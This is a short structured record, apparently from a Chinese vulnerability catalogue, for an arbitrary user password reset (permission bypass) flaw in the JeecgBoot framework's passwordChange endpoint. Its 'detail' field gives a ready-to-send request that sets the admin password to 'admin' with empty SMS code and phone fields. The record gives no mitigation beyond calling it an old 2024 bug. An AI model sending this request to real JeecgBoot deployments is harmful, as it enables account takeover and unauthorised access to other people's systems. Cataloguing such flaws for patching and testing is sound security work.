vendor = "JeecgBoot"
name = "JeecgBoot 框架passwordChange接口存在任意用户密码重置"
type = "权限绕过"
version = "未知"
path = "/novat-boot/sys/user/passwordChange"
detail = "/novat-boot/sys/user/passwordChange?username=admin&password=admin&smscode=&phone="
fix = "24年老洞"
date = "0704"
label = "nday"
verifier = "AdySec"
